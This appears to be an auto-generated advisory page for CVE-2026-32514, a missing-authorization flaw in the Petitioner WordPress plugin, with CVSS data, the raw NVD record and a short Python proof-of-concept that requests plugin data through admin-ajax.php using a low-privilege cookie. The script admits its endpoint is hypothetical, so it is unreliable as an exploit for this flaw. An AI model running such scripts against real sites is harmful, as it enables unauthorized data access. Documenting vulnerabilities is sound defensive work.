Security Vulnerability Report
中文
CVE-2026-32514 CVSS 6.5 MEDIUM

CVE-2026-32514

Published: 2026-03-25 17:17:04
Last Modified: 2026-04-29 10:17:18

Description

Missing Authorization vulnerability in Anton Voytenko Petitioner petitioner allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Petitioner: from n/a through <= 0.7.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Petitioner <= 0.7.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Exploit Title: Petitioner Plugin < 0.7.3 - Missing Authorization PoC # Date: 2026-03-25 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/plugins/petitioner/ # Software Link: https://downloads.wordpress.org/plugin/petitioner.0.7.3.zip # Version: <= 0.7.3 # Tested on: WordPress 6.x import requests target_url = "http://example.com/wp-admin/admin-ajax.php" # Hypothetical endpoint based on typical plugin structure action = "get_petitioner_data" # Attacker uses a low-privileged session cookie (e.g., subscriber) cookies = { "wordpress_logged_in_xxx": "low_priv_user_cookie_value" } payload = { "action": action, "id": "1" # Attempting to access ID 1 } try: response = requests.post(target_url, data=payload, cookies=cookies) if response.status_code == 200 and "sensitive_data" in response.text: print("[+] Vulnerability Exploited Successfully!") print(f"[+] Data: {response.text}") else: print("[-] Exploit failed or target not vulnerable.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32514", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:03.830", "lastModified": "2026-04-29T10:17:17.620", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Anton Voytenko Petitioner petitioner allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Petitioner: from n/a through <= 0.7.3."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Anton Voytenko Petitioner petitioner permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Petitioner: desde n/a hasta &lt;= 0.7.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/petitioner/vulnerability/wordpress-petitioner-plugin-0-7-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}